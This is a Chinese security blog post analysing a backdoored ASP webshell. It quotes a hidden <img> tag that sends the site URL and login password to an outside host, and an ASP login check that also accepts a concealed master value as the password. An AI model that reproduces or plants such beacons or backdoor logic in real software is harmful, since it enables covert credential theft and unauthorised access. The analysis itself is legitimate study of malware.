webshell后门分析第一篇

暗月博客 2019年11月21日15:58:05评论332 views字数 1139阅读3分47秒阅读模式
摘要

webshell后门分析第一篇               很大可能会连载:

webshell后门分析第一篇

               很大可能会连载

     今天一位学员发来了webshell箱子 但是箱子里面没有明显的密码 不像以前的箱子

     这种webshell箱子 引起了我莫大的兴趣。

如图:

webshell后门分析第一篇  

 

       立马想了一个方案。。随便找了几个webshell 进行爆破 。

        几分钟后得到一个webshell

       注:webshell 没有加密的 这里没得写解密过程了。

       下了个asp小型服务器 打开进程里面 进行监控 输入正确密码 查找一切GET /POST之类的相关连接

       果断有发现 如图所示:

           webshell后门分析第一篇

 

       留意host 这里估计就是收信的地址 whois 果断得到 箱子作者的QQ邮箱加QQ号 其实我真不想社 俺晚上还有初中聚会岂能表现出闲得蛋疼的样子,果断不扯淡做箱子的人。

       这里感到很奇怪 以往的的webshell箱子 都是获取网址+密码 然后发送到远程服务器。 但是这个webshell很另类。难道我孤陋寡闻。还是 落后了 我的思想。

      看到

<img src='http://www.moonhack.org/web/pr/?"&u&"'></img>

webshell后门分析第一篇

看到这个标签 我表示作者真的很有水平,<img>我表示成功登陆 肯定会执行一次 ,所以在远程服务器做一个记录就行了。多隐蔽但是岂能 逃出哥的法眼。

         回想起 我们之前箱子所说 后缀 参数 这里不知道我说什么,请回去看我们第一张高清有码图。根据这个这些 我仔细阅读了这份没有加密的网马 ?果断有所发现:

       如图所示:

              webshell后门分析第一篇

              跟踪 URL变量 三十二个有木有

       如图所示:

              webshell后门分析第一篇

       好吧 我仔细看 看到这块代码 感觉不对

if session("KKK")<>UserPass then if request.form("pass")<>"" or request("pass")<>"" then if request.form("pass")=UserPass or request.form("pass")=url then session("KKK")=UserPass response.redirect url else

最后一个if 有逻辑问题 传入来的变量 等于UserPass或者 等于url 只有满足其中一个就可以登录了。

         最后结果如图:

                    webshell后门分析第一篇

                 ---------------淫荡分割-------

                   webshell后门分析第一篇

                     分析完毕后 又发来一只网马  好吧 等我聚会回来继续帮你分析。。。。。。。。

 

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
暗月博客
  • 本文由 发表于 2019年11月21日15:58:05
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   webshell后门分析第一篇http://cn-sec.com/archives/71008.html

发表评论

匿名网友 填写信息